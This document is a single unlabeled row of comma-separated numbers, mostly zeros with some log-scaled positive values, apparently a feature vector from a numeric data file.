0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 4.204692619390966, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.9384838577066197, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 3.295836866004329, 0, 3.9889840465642745, 0, 0.0, 0, 0.0, 0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.390770307485499, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 10.55570332597337, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.356708826689592, 0.0, 0, 0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.4849066497880004, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9318256327243257, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.258096538021482, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 3.7369991058576035, 0.0, 2.302585092994046, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0, 0.0, 4.631631038266565, 0, 0, 0.0, 0.0, 0.0, 6.198469360840315, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.6888794541139363, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.787491742782046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 